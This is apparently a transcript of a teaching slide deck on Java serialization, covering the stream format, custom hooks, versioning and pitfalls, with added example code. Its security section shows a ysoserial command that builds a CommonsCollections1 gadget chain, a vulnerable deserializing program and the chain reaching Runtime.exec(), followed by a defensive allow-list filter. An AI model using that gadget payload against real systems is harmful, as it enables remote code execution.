
Java Serialization Deep Dive

Java Serialization is often considered a dark art of Java programmers. This session will lift the veil and show what serialization is and isn't, how you can use it for profit and evil. After this session no NotSerializableException will be unconquerable.



  1. Java Serialization Deep Dive
 Martijn Dashorst, topicus
  2. Agenda
 1. What is (Java) Serialization?
 2. How does Java Serialization work?
 3. Common Pitfalls of Serialization
 4. Summary
  3. Martijn Dashorst, topicus
  4. ParnasSys: Primary Education Student Information System; 5k schools in NL, 1M students, 15k concurrent users
  5. Built with Apache Wicket: a Java+HTML, server-side, component oriented, stateful web framework for applications
  6. Part 1: What is Java Serialization?
  7. serialization | sɪərɪəlʌɪˈzeɪʃ(ə)n | noun
 java objects --(serialization)--> AC ED 00 05 73 72 00 1B 64 65 65 70 64 69 76 65 --(deserialization)--> java objects
 (the bytes shown are the stream header AC ED 00 05, TC_OBJECT 73, TC_CLASSDESC 72 and a 0x1B-byte class name starting with "deepdive")
  8. Why Serialization?
 • Storage of objects
 • Copying data
 • Caching of data
 • HTTP sessions
 • Transmitting data/objects across the network
  9. Part 2: How Does Java Serialization Work? (Serialization in a nutshell; Default Java Serialization; Custom Java Serialization; Versioning; Security). Next up: Serialization in a nutshell
  10. Java Serialization in a nutshell (slides 10 to 14 build up this code one line at a time)
   class Foo implements Serializable { }

   Foo foo = new Foo();
   FileOutputStream fos = new FileOutputStream("foo.ser");
   ObjectOutputStream oos = new ObjectOutputStream(fos);
   oos.writeObject(foo);
  15. Java Serialization in a nutshell: written 24 bytes
        0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15
     1 AC ED 00 05 73 72 00 03 46 6F 6F 00 00 00 00 00 | ····sr··Foo····· |
     2 00 00 01 02 00 00 78 70                         | ······xp         |
  16. Java Serialization in a nutshell (slides 16 to 19 build up the reading side one line at a time)
   class Foo implements Serializable { }

   FileInputStream fis = new FileInputStream("foo.ser");
   ObjectInputStream ois = new ObjectInputStream(fis);
   Foo foo = (Foo) ois.readObject();   // slide 18 first shows this as: Object object = ois.readObject();
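Added example (not from the deck): a program that writes an empty Foo exactly as slides 10 to 14 do, decodes the resulting bytes field by field to show where the 24 bytes of slide 15 come from, and reads the object back as on slides 16 to 19. It assumes Foo declares serialVersionUID = 1L, which is what the dump on slide 15 shows; the class and method names around it are the example's own.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamConstants;
import java.io.Serializable;

// Top-level and in the default package so the class name in the stream is exactly "Foo".
// Assumption: the deck's Foo carried serialVersionUID = 1L, as the bytes on slide 15 show.
class Foo implements Serializable {
    private static final long serialVersionUID = 1L;
}

public class StreamHeaderDump {

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Decodes the fixed leading part of the stream grammar: magic, version, TC_OBJECT,
    // TC_CLASSDESC, class name, serialVersionUID, flags, field count, TC_ENDBLOCKDATA
    // (end of class annotations) and the super-class descriptor (TC_NULL here). Only the
    // subset needed for a field-less class without a serializable super-class is handled.
    static void dumpHeader(byte[] bytes) throws IOException {
        DataInputStream in = new DataInputStream(new ByteArrayInputStream(bytes));
        int magic = in.readShort() & 0xFFFF;          // AC ED
        short version = in.readShort();               // 00 05
        System.out.printf("magic=0x%04X version=%d%n", magic, version);
        expect(in.readByte(), ObjectStreamConstants.TC_OBJECT, "TC_OBJECT");          // 73
        expect(in.readByte(), ObjectStreamConstants.TC_CLASSDESC, "TC_CLASSDESC");    // 72
        String className = in.readUTF();              // 00 03 'F' 'o' 'o'
        long suid = in.readLong();                    // 8 bytes, 1 here
        byte flags = in.readByte();                   // 02 = SC_SERIALIZABLE
        short fieldCount = in.readShort();            // 00 00
        System.out.printf("class=%s serialVersionUID=%d flags=0x%02X fields=%d%n",
                className, suid, flags, fieldCount);
        expect(in.readByte(), ObjectStreamConstants.TC_ENDBLOCKDATA, "TC_ENDBLOCKDATA"); // 78
        expect(in.readByte(), ObjectStreamConstants.TC_NULL, "TC_NULL (no super-class)");  // 70
        System.out.println("bytes after the descriptor: " + in.available()); // 0: Foo has no field data
    }

    private static void expect(byte actual, byte wanted, String name) throws IOException {
        if (actual != wanted) {
            throw new IOException(String.format("expected %s (0x%02X) but read 0x%02X", name, wanted, actual));
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] bytes = serialize(new Foo());
        StringBuilder hex = new StringBuilder();
        for (byte b : bytes) hex.append(String.format("%02X ", b));
        System.out.println(bytes.length + " bytes: " + hex);  // 24 bytes: AC ED 00 05 73 72 00 03 46 6F 6F ...
        dumpHeader(bytes);

        // Round trip, as on slides 16 to 19.
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            Foo foo = (Foo) ois.readObject();
            System.out.println("read back: " + foo.getClass().getName());
        }
    }
}
```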
  20. Part 2: How Does Java Serialization Work? Next up: Default Java Serialization
  21. Rules of Default Serialization
 1. Implement java.io.Serializable
 2. Identify (non-)serializable fields
 3. Have access to the no-args constructor of the first non-serializable superclass
   class Foo implements Serializable {
     private int count;
     private String name;
     private Thread thread;
   }
  22. Quiz
   class Foo implements Serializable { int f; }
   class Bar extends Foo { int b; }

   Bar bar1 = new Bar();
   bar1.f = 123;
   bar1.b = 456;
   ObjectOutputStream oos = new ...
   oos.writeObject(bar1);
   ObjectInputStream ois = new ...
   Bar bar2 = (Bar) ois.readObject();
 Which are true?
 • bar2.f == 0
 • bar2.f == 123
 • bar2.b == 0
 • bar2.b == 456
  23. Answer slide: same code and options as slide 22.
  24. Quiz
   class Foo { int f; }
   class Bar extends Foo implements Serializable { int b; }

   Bar bar1 = new Bar();
   bar1.f = 123;
   bar1.b = 456;
   ObjectOutputStream oos = new ...
   oos.writeObject(bar1);
   ObjectInputStream ois = new ...
   Bar bar2 = (Bar) ois.readObject();
 Which are true?
 • bar2.f == 0
 • bar2.f == 123
 • bar2.b == 0
 • bar2.b == 456
  25. Answer slide: same code and options as slide 24.
  26. Rules of Default Serialization (same content as slide 21); rule 2 follows.
  27. 2. Identify (non-)serializable fields
 Serializable:
 • primitive fields
 • String, Float, Double, ...
 • anything implementing Serializable or Externalizable
 Not Serializable:
 • static fields
 • instance fields of enum types
 • local (physical) resources: connections, threads, file handles
  28. 2. Identify (non-)serializable fields
   class Foo implements Serializable {
     private int count;
     private String name;
     private transient Thread thread;
   }
 Use the transient keyword to mark fields not-serializable
  29. 2. Identify (non-)serializable fields
   class Foo implements Serializable {
     private transient int count = 1234;
     private String name;
     private transient Thread thread;
   }

   ObjectInputStream ois = ...
   Foo foo = (Foo) ois.readObject();
   assert foo.thread == null;
   assert foo.count == 0;
 Use the transient keyword to mark fields non-serializable. Upon deserialization non-serializable fields are given a default value: 0, false, null (the field initializer count = 1234 does not run, because the constructor of a Serializable class is not called during deserialization).
  30. 2. Identify (non-)serializable fields
   class UsingSerialPersistentFields implements Serializable {
     private int f = 123;
     private int g = 456;
     private static final ObjectStreamField[] serialPersistentFields = {
       new ObjectStreamField("f", Integer.TYPE)
     };
   }
 Use serialPersistentFields to mark the fields that are to be serialized. It overrides the transient keyword and must be private static final.
  31. Rules of Default Serialization, rule 3: have access to the no-args constructor of the first non-serializable superclass
   class Foo { Foo() { } }
   class Bar extends Foo implements Serializable { }
 👍
  32. Rules of Default Serialization, rule 3: have access to the no-args constructor of the first non-serializable superclass
   class Foo { Foo(int f) { } }
   class Bar extends Foo implements Serializable { }
 🚫
  33. 3. Have access to the no-args constructor of the first non-serializable superclass
   class Bar1 { Bar1(int b) { } }
   class Bar2 extends Bar1 implements Serializable {
     Bar2() { super(1); }
   }

   Bar2 bar2 = new Bar2();
   oos.writeObject(bar2);
   Bar2 b2 = (Bar2) ois.readObject();
 Which are true?
 • Serialization of bar2 succeeds
 • Serialization of bar2 fails with NotSerializableException
 • Deserialization of b2 succeeds
 • Deserialization of b2 fails with InvalidClassException
  34. Answer slide: same code and options as slide 33.
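Added example (not the deck's code): the three class layouts from the quizzes on slides 22, 24 and 33 run through an in-memory round trip so the answers can be observed. It goes slightly beyond slide 24 by giving the non-serializable super-class an explicit no-args constructor that sets f to -1, which makes visible that this constructor, not the stream, initialises the super-class fields (with the slide's implicit constructor the value is 0). Class names other than Bar1/Bar2 and the roundTrip helper are the example's own.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Slide 22: the super-class is Serializable, so its field f is written and read back.
class SerFoo implements Serializable { int f; }
class SerBar extends SerFoo { int b; }

// Slide 24: the super-class is not Serializable. Its field f is NOT written; on read the
// accessible no-args constructor of PlainFoo runs and initialises f (here to -1, to make
// that visible; the slide's implicit constructor leaves it at 0).
class PlainFoo { int f; PlainFoo() { f = -1; } }
class PlainBar extends PlainFoo implements Serializable { int b; }

// Slide 33: the first non-serializable super-class has no no-args constructor at all.
class Bar1 { Bar1(int b) { } }
class Bar2 extends Bar1 implements Serializable { Bar2() { super(1); } }

public class DefaultSerializationRules {

    @SuppressWarnings("unchecked")
    static <T> T roundTrip(T o) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()))) {
            return (T) ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        SerBar sb = new SerBar(); sb.f = 123; sb.b = 456;
        SerBar sb2 = roundTrip(sb);
        System.out.println("serializable super-class: f=" + sb2.f + " b=" + sb2.b);   // f=123 b=456

        PlainBar pb = new PlainBar(); pb.f = 123; pb.b = 456;
        PlainBar pb2 = roundTrip(pb);
        System.out.println("non-serializable super-class: f=" + pb2.f + " b=" + pb2.b); // f=-1 b=456

        // Writing Bar2 succeeds: the constructor rule is only checked when reading.
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(new Bar2()); }
        System.out.println("Bar2 written: " + bos.size() + " bytes");
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()))) {
            ois.readObject();
            System.out.println("Bar2 read back (not expected)");
        } catch (InvalidClassException e) {
            System.out.println("Bar2 read failed: " + e.getMessage());   // "... no valid constructor"
        }
    }
}
```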
  35. Steps of Default Serialization: ObjectOutputStream::writeObject(Object o) (built up over slides 35 to 37)
 1. Object replacement = o.writeReplace();
 2. replacement.writeObject(oos);
   class Foo implements Serializable {
     private Object writeReplace() { return this; }
     private void writeObject(ObjectOutputStream out) throws IOException {
       out.defaultWriteObject();
     }
   }
  38. Steps of Default Deserialization: ObjectInputStream::readObject() (built up over slides 38 to 43)
 1. Object read = «new Foo»;   (an instance is allocated without running Foo's own constructor)
 2. read.readObject(in)
 3. result = read.readResolve()
 4. result.validateObject()
 5. return result
   class Foo implements Serializable, ObjectInputValidation {
     private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
       in.defaultReadObject();
     }
     private Object readResolve() { return this; }
     public void validateObject() throws InvalidObjectException { }
   }
  44. Part 2: How Does Java Serialization Work? Next up: Custom Java Serialization
  45. Using writeReplace for Placeholders
   class NotActuallySerializable implements Serializable {
     private Object writeReplace() {
       return new Placeholder(someValue);
     }
     public static NotActuallySerializable of(String value) {
       return ...;
     }
   }
   class Placeholder implements Serializable {
     private String value;
     Placeholder(String value) { this.value = value; }
     private Object readResolve() {
       return NotActuallySerializable.of(value);
     }
   }
  46. Using readResolve for Singletons
   final class Serialization implements Serializable {
     public static final Serialization YAY = new Serialization("Yay");
     public static final Serialization NAY = new Serialization("Nay");
     private final String value;
     private Serialization(String v) { this.value = v; }
     private Object readResolve() {
       if (value.equals("Yay")) return YAY;
       else return NAY;
     }
   }
  47. readResolve/writeReplace quiz
   class Foo implements Serializable {
     static final Foo foo = new Foo();
     private Object writeReplace() { return "Hello!"; }
     private Object readResolve() { return foo; }
   }

   oos.writeObject(Foo.foo);
   Foo f1 = (Foo) ois.readObject();
 Which is true?
 • f1.equals("Hello!")
 • f1 == Foo.foo
 • f1 != Foo.foo
 • Exception is thrown
  48. Answer slide: same code and options as slide 47.
  49. readResolve/writeReplace quiz
   class Foo implements Serializable {
     private Object readResolve() { return "Hello!"; }
   }
   class Bar extends Foo { }

   oos.writeObject(new Bar());
   Object o = ois.readObject();
 Which are true?
 • o.equals("Hello!")
 • o instanceof String
 • o instanceof Bar
 • Exception is thrown
  50. Answer slide: same code and options as slide 49.
  51. writeObject / readObject (slide 52 adds the readObject half)
   class CustomValues implements Serializable {
     private void writeObject(ObjectOutputStream oos) throws IOException {
       oos.defaultWriteObject();
       // write custom data
     }
     private void readObject(ObjectInputStream ois) throws ClassNotFoundException, IOException {
       ois.defaultReadObject();
       // read custom data
       // initialize transient fields
     }
   }
  53. Externalizable
   public interface Externalizable extends Serializable {
     void writeExternal(ObjectOutput out) throws IOException;
     void readExternal(ObjectInput in) throws IOException, ClassNotFoundException;
   }
 • Must implement java.io.Externalizable
 • Must have a public no-args constructor
 • Implement both writeExternal() and readExternal()
  54. ObjectInputValidation
   public interface ObjectInputValidation {
     public void validateObject() throws InvalidObjectException;
   }
 • Allows the complete deserialized object graph to be validated before it is returned
 • Register with the ObjectInputStream (in readObject): ois.registerValidation(this, 0);
 • Performed after readResolve()
  55. Part 2: How Does Java Serialization Work? Next up: Versioning
  56. Always provide serialVersionUID
   class Foobar implements Serializable {
     private static final long serialVersionUID = 1L;
   }
 "It is strongly recommended that all serializable classes explicitly declare serialVersionUID values, since the default serialVersionUID computation is highly sensitive to class details that may vary depending on compiler implementations, and can thus result in unexpected serialVersionUID conflicts during deserialization, causing deserialization to fail." (java.io.Serializable javadoc)
  57. Same as slide 56, with emphasis: serialVersionUID is required!!!
  58. Versioning: compatible and incompatible changes
 Incompatible changes (change serialVersionUID):
 • Deleting fields
 • Can't go from Serializable → Externalizable
 • Move classes up/down the hierarchy
 • Serializable field → Non-serializable field (static/transient)
 • primitive field type change
 • Class → Enum or Enum → Class
 • Remove Serializable/Externalizable
 Compatible changes (don't change serialVersionUID):
 • Adding fields
 • Adding classes
 • Removing classes
 • Adding writeObject/readObject
 • Adding Serializable
 • Changing access modifiers for fields
 • Non-serializable field → serializable field
  59. Part 2: How Does Java Serialization Work? Next up: Security
  60. Serialized data is readable (an xxd hex dump of a serialized stream; class names such as org.apache.commons.collections.functors.ChainedTransformer, ConstantTransformer, InvokerTransformer and java.lang.Runtime appear in clear text)
  61. Don't trust serialized data (the same stream shown as printable text: besides the Commons Collections transformer classes it contains the strings getRuntime, getMethod, invoke and exec, the method names the payload reaches through reflection)
  62. Deserializing an untrusted file
   public class Main {
     public static void main(String[] args) throws Exception {
       File file = new File(args[0]);
       try (FileInputStream fis = new FileInputStream(file);
            ObjectInputStream ois = new ObjectInputStream(fis)) {
         while (ois.available() >= 0)
           ois.readObject();
       }
     }
   }
  63. Generating a gadget chain with ysoserial and feeding it to that program
   $ java -jar ysoserial.jar CommonsCollections1 "Calc.exe" > gadget.ser

   public class Main {
     public static void main(String[] args) throws Exception {
       File file = new File("gadget.ser");
       try (FileInputStream fis = new FileInputStream(file);
            ObjectInputStream ois = new ObjectInputStream(fis)) {
         while (ois.available() >= 0)
           ois.readObject();
       }
     }
   }

   <dependency>
     <groupId>commons-collections</groupId>
     <artifactId>commons-collections</artifactId>
     <version>3.1</version>
   </dependency>

   java Main gadget.ser
  64. Y so seriAL: the deserialization gadget chain
   ObjectInputStream.readObject()
     AnnotationInvocationHandler.readObject()
       Map(Proxy).entrySet()
         AnnotationInvocationHandler.invoke()
           LazyMap.get()
             ChainedTransformer.transform()
               ConstantTransformer.transform()
               InvokerTransformer.transform()
                 Method.invoke()
                   Class.getMethod()
               InvokerTransformer.transform()
                 Method.invoke()
                   Runtime.getRuntime()
               InvokerTransformer.transform()
                 Method.invoke()
                   Runtime.exec()
  65. Don't trust serialized data. Y so seriAL: https://github.com/frohoff/ysoserial
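Added example (not from the deck and not from ysoserial): the defensive counterpart to slides 60 to 65, a deserialization allow-list built on the java.io.ObjectInputFilter API that exists since Java 9. The class names and the depth/array limits are the example's own; the filter is consulted for every class descriptor before the class is resolved or instantiated, which is why an unlisted class never gets its readObject() or readResolve() executed.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;
import java.util.Set;

public class FilteredDeserialization {

    // The only type this (hypothetical) endpoint expects to receive.
    static class Foo implements Serializable {
        private static final long serialVersionUID = 1L;
        int count = 42;
    }

    // Allow-list filter. Classes not on the list are rejected outright; nesting depth and
    // array length are capped so a deeply nested or huge stream cannot exhaust the reader.
    static ObjectInputFilter allowOnly(Set<Class<?>> allowed) {
        return info -> {
            if (info.depth() > 10 || info.arrayLength() > 1000) {
                return ObjectInputFilter.Status.REJECTED;
            }
            Class<?> cl = info.serialClass();
            if (cl == null) {
                // Not a class check (depth/reference/byte-count check only): leave undecided.
                return ObjectInputFilter.Status.UNDECIDED;
            }
            return allowed.contains(cl) ? ObjectInputFilter.Status.ALLOWED
                                        : ObjectInputFilter.Status.REJECTED;
        };
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Reads a single object from bytes of unknown origin with the filter installed.
    static Object readFiltered(byte[] untrusted, ObjectInputFilter filter)
            throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(untrusted))) {
            ois.setObjectInputFilter(filter);   // must be installed before the first readObject()
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        ObjectInputFilter filter = allowOnly(Set.of(Foo.class));

        Foo foo = (Foo) readFiltered(serialize(new Foo()), filter);
        System.out.println("accepted: " + foo.getClass().getName() + " count=" + foo.count);

        // HashMap is harmless, but it stands in for any class that is not on the list,
        // which is what the first class descriptor of a gadget-chain payload would be.
        try {
            readFiltered(serialize(new HashMap<String, Integer>()), filter);
            System.out.println("accepted HashMap (not expected)");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());   // filter status: REJECTED
        }
    }
}
```

On JDKs older than 9 the same effect is obtained by subclassing ObjectInputStream and overriding resolveClass to refuse descriptors that are not on the list; on 9 and later a process-wide filter can also be set with the jdk.serialFilter system property.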
  66. Part 3: Common Pitfalls of Java Serialization (CDI/Spring/Singletons; Inner/nested classes). Next up: CDI/Spring/Singletons
  67. ApplicationScoped Spring beans, Singletons, Services
   @ApplicationScoped
   class FooService {
     void foo() {}
   }
   class Bar implements Serializable {
     @Inject private FooService fooService;
     void doSomething() { fooService.foo(); }
   }
  68. Same code as slide 67. The problems:
 • Serializes too much (possibly the whole service layer)
 • Deserializes to non-managed services
 • Deserialization gives multiple instances of one service
  69. Same code as slide 67. The remedies:
 • Use a serializable proxy that looks up the service (CDI)
 • Use readResolve/writeReplace for custom serialization/deserialization
 • CDI @Singleton injection *doesn't* inject a serializable proxy, but the instance directly
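Added example, not from the deck: the writeReplace/readResolve placeholder pattern of slide 45 applied to the injected-service problem of slides 67 to 69, with the naive version beside it. ServiceRegistry stands in for the CDI/Spring container and is an assumption, as are all class and method names other than FooService and Bar.

```java
import java.io.*;
import java.util.HashMap;
import java.util.Map;

// Stand-in for the CDI/Spring container (assumption: a real application would ask the
// container for the bean instead of this static map).
class ServiceRegistry {
    private static final Map<String, Object> SERVICES = new HashMap<>();
    static void register(String name, Object service) { SERVICES.put(name, service); }
    static Object lookup(String name) {
        Object s = SERVICES.get(name);
        if (s == null) throw new IllegalStateException("no service registered as " + name);
        return s;
    }
}

// The @ApplicationScoped service of slide 67: deliberately NOT Serializable.
class FooService {
    void foo() { System.out.println("foo() on FooService@" + System.identityHashCode(this)); }
}

// What slide 68 warns about: a plain field holding the service. Writing this fails with
// NotSerializableException; had FooService been Serializable it would instead have been
// copied into the stream, yielding a second, unmanaged instance on read.
class NaiveBar implements Serializable {
    private static final long serialVersionUID = 1L;
    FooService fooService;
}

// The remedy from slides 45 and 69: writeReplace swaps the object for a placeholder that
// carries only the service NAME; the placeholder's readResolve rebuilds Bar around the
// container's single instance.
class Bar implements Serializable {
    private static final long serialVersionUID = 1L;
    private final String customer;                  // ordinary state, travels in the stream
    private final transient FooService fooService;  // injected singleton, never travels

    Bar(String customer, FooService fooService) { this.customer = customer; this.fooService = fooService; }
    FooService service() { return fooService; }
    void doSomething() { fooService.foo(); }

    // Step 1 of ObjectOutputStream::writeObject (slide 36): Bar itself is never written.
    private Object writeReplace() { return new Placeholder(customer, "fooService"); }

    static final class Placeholder implements Serializable {
        private static final long serialVersionUID = 1L;
        private final String customer;
        private final String serviceName;
        Placeholder(String customer, String serviceName) { this.customer = customer; this.serviceName = serviceName; }

        // Step 3 of ObjectInputStream::readObject (slide 41): the reader gets a Bar back.
        private Object readResolve() {
            return new Bar(customer, (FooService) ServiceRegistry.lookup(serviceName));
        }
    }
}

public class ServicePlaceholderDemo {
    @SuppressWarnings("unchecked")
    static <T> T roundTrip(T o) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()))) {
            return (T) ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        FooService managed = new FooService();
        ServiceRegistry.register("fooService", managed);

        NaiveBar naive = new NaiveBar();
        naive.fooService = managed;
        try {
            roundTrip(naive);
        } catch (NotSerializableException e) {
            System.out.println("naive Bar: NotSerializableException: " + e.getMessage()); // FooService
        }

        Bar copy = roundTrip(new Bar("acme", managed));
        System.out.println("same managed instance after round trip: " + (copy.service() == managed)); // true
        copy.doSomething();
    }
}
```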
  70. Part 3: Common Pitfalls of Java Serialization. Next up: Inner/nested classes
  71. Inner/Nested classes
   class FooService {
     class Bar implements Serializable {}
     public Bar getBar() { return new Bar(); }
   }

   ObjectOutputStream oos = ...;
   FooService service = ...;
   Bar bar = service.getBar();
   oos.writeObject(bar);
 Which is true?
 • gives a compilation error at one of the last two lines
 • bar gets serialized
 • Exception is thrown
  72. Answer slide: same code and options as slide 71.
  73. Same code as slide 71. Not serializable: the inner class Bar requires an enclosing FooService instance, which is not Serializable.
  74. Agenda (repeated)
 1. What is (Java) Serialization?
 2. How does Java Serialization work?
 3. Common Pitfalls of Serialization
 4. Summary
  75. Summary
 Java serialization is:
 • Versatile
 • Flexible
 • Complete
 • Complex
 Java deserialization is:
 • Insecure
  76. Performance considerations (chart comparing java serialization with XML/JAXB; source, 27-10-2016: https://github.com/eishay/jvm-serializers/wiki)
  77. Size considerations (chart comparing java serialization with XML/JAXB; same source, 27-10-2016: https://github.com/eishay/jvm-serializers/wiki)
